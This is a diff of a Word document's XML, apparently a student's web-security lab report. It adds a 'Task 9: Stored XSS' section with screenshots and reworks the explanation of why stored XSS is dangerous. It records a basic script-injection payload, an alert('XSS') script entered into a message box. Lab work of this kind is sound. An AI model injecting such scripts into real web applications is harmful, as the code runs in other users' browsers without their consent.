-        <w:t xml:space="preserve">Exploit payload entered in Message Box - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>&lt;script&gt;alert("XSS");&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3547F6" wp14:editId="3A16A56C">
-            <wp:extent cx="5943600" cy="3589655"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="6" name="Picture 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -868,6 +986,89 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3625850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Task 9: Stored XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Exploit payload entered in Message Box - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;alert("XSS");&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3547F6" wp14:editId="3A16A56C">
+            <wp:extent cx="5943600" cy="3589655"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5943600" cy="3589655"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -903,12 +1104,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>Stored XSS is more dangerous because the exploit can be stored on the web application’s server and database. This will allow the exploit to be executed by other users of the</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:t xml:space="preserve"> web application.</w:t>
+        <w:t>Stored XSS is more dangerous because the exploit can be stored on the web application’s server and database. This will allow the exploit to be executed by other users of the web application.</w:t>
       </w:r>
     </w:p>
     <w:p>
